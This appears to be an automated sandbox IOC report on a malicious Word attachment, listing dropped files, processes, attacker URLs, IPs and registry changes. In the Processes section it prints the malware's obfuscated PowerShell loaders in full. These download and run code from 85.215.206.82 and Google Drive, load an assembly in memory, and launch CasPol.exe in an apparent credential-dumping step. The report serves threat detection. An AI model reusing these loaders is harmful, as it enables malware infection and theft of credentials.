IOC Report
PO NAHK22012FA00000.docx.doc

loading gif

Files

File Path
Type
Category
Malicious
PO NAHK22012FA00000.docx.doc
Microsoft Word 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wennedgreatthingswithgoodnwesforentrielifewithnew[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
malicious
C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\wordse\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\wg on 85.215.206.82.url
MS Windows 95 Internet shortcut text (URL=<http://85.215.206.82/270/weg/wg/>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\PO NAHK22012FA00000.docx.doc (copy)
Microsoft Word 2007+
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc
Rich Text Format data, version 1
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\igetbestthingswithbestpicturewithgreatthingsonme[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E0D7C69.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.doc
Rich Text Format data, version 1
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C822756.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE247C08.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{31C8DBE6-DED8-4583-AB75-14E1E3ACB524}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77039A4A-3CCA-4E7C-9155-734CF6DE2D7F}.tmp
StarOffice Gallery theme j, 1828744448 objects, 1st 4
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C04F3BA9-D42B-4460-B369-5ADD06F8F9F6}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\32orfxa5.xky.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4vblszqe.3c0.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES8872.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Wed Oct 23 15:26:43 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\bhv2D0A.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x3d910114, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\cr3vv3qh.aty.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\fhc1yjos.o0o.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (360)
dropped
C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.out
Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\kp2rft3g.p1l.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\oexlux
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\yuqpzirf.dpk.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zinwfomv.v5n.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zok2xz0x.0es.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{9D8D5709-A9EE-48B7-B6ED-966EA6C2137E}
data
dropped
C:\Users\user\AppData\Local\Temp\{F6966D4E-6AED-40BD-80DB-6F2926526672}
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO NAHK22012FA00000.docx.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Wed Oct 23 14:26:05 2024, length=711761, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [doc]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$ NAHK22012FA00000.docx.doc
data
dropped
C:\Users\user\Desktop\~WRD0000.tmp
Microsoft Word 2007+
dropped
C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier
ASCII text, with CRLF line terminators
modified
There are 35 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP"
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc
85.215.206.82
malicious
https://u4u.kids/clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak
24.199.88.84
malicious
http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta
85.215.206.82
malicious
http://85.215.206.82/270/WRFFDCE.txt
85.215.206.82
malicious
http://85.215.206.82/270/igetbestthingswithbestpicturewithgreatthingsonme.tIF
85.215.206.82
malicious
http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta:
unknown
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://go.micros
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gpE
unknown
http://geoplugin.net/json.gp/C
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.htaj
unknown
https://drive.usercontent.google.com
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
http://www.imvu.com/y
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://geoplugin.net/json.gpw
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://85.215.206.82/270/weg/wg/
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://support.google
unknown
https://drive.google.com
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.nirsoft.net8E
unknown
https://github.com/dahall/taskscheduler
unknown
http://www.ebuddy.com
unknown
There are 68 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
servemail.exprotedsteel.pro
45.90.89.98
malicious
u4u.kids
24.199.88.84
malicious
geoplugin.net
178.237.33.50
drive.google.com
142.250.181.238
drive.usercontent.google.com
216.58.212.129

IPs

IP
Domain
Country
Malicious
45.90.89.98
servemail.exprotedsteel.pro
Bulgaria
malicious
24.199.88.84
u4u.kids
United States
malicious
85.215.206.82
unknown
Germany
malicious
142.250.181.238
drive.google.com
United States
178.237.33.50
geoplugin.net
Netherlands
216.58.212.129
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Rmc-N6HMP4
exepath
malicious
HKEY_CURRENT_USER\Software\Rmc-N6HMP4
licence
malicious
HKEY_CURRENT_USER\Software\Rmc-N6HMP4
time
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
/00
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
%20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
+60
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://u4u.kids/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
~0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3003F
3003F
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 1
Data
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
